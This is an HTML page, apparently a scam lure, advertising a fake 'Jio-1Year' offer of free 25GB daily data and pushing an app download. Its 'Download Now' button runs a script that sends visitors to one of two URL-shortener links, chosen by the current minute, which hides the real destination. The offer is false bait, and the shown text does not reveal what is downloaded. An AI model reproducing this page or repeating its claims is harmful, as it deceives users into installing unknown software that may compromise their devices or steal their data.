
<html>
    
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	
	<head>
		<Title>Download</Title>
		<style>
			body{
				font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
			}
	
	.dabavanu {
		background-color:#315cbb;
		cursor:pointer;
		color:#ffffff;
		font-family:Arial;
		font-size:20px;
		font-weight:bold;
		padding: 15px;
		text-decoration:none;
		text-shadow:0px 1px 0px #315cbb;
	}
	.dabavanu:hover {
		background-color:#315cbb;
	}
	.dabavanusw {
		background-color:#315cbb;
		cursor:pointer;
		color:#ffffff;
		font-family:Arial;
		font-size:20px;
		font-weight:bold;
		padding: 15px;
		text-decoration:none;
		text-shadow:0px 1px 0px #315cbb;
	}
	.dabavanu:active {
		position:relative;
		top:1px;
	}
	
		</style>
	</head>
	<script>
	function clik() 
	{
		var m = new Date().getMinutes(); 
		if(m%2==0)
		{
			window.location="http://tiny.cc/tinyj25d"; 
		}
		else
		{
			window.location="http://tiny.cc/tinyj25v";
		}
	}
	</script>
	<body>
	<center>
		
			<img src="https://i.postimg.cc/05S82x0x/jtras.png"  height="100"/>
			<h2>Jio-1Year</h2><h3>
			Jio is giving free 25GB data<br>
	daily to all Jio users.<br>
	VALIDITY FOR 1-YEAR<br><br>
	Download app now to enjoy Offer</h3>
			<div onclick="clik()"  class="dabavanu">Download Now</a>
	
	
			
	
	
		</div>
	</center>
	</html>
	